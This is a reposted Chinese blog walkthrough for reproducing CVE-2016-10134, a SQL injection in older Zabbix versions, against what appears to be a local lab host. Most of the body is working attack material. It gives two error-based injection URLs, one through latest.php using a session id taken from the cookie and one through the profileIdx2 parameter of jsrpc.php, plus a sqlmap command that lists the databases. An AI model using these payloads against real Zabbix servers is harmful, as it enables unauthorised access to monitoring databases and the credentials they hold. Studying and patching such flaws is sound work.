码迷,mamicode.com
首页 > 数据库 > 详细

zabbix latest.php SQL注入漏洞(CVE-2016-10134)

时间:2021-03-02 12:07:31      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:--   images   _id   data   srp   ase   source   base   lock   

Zabbix 2.2.14之前的版本和3.0.4之前的3.0版本

技术图片

latest.php页面
提取cookie中的zbx_sessionid的后16位

技术图片

246c58ba963457ef

http://192.168.49.2:8080/latest.php?output.php=ajax&sid=246c58ba963457ef&favobj=toggle&toggle_open_state=1&toggle_ids=updatexml(0,concat(0xa,database()),0)

技术图片

jsrpc.php页面

http://192.168.49.2:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,database()),0)

技术图片

 

sqlmap -u "http://192.168.49.2:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1234" -p "profileIdx2" --technique E --dbs

 

技术图片

zabbix latest.php SQL注入漏洞(CVE-2016-10134)

标签:--   images   _id   data   srp   ase   source   base   lock   

原文地址:https://www.cnblogs.com/bingtang123/p/14464410.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!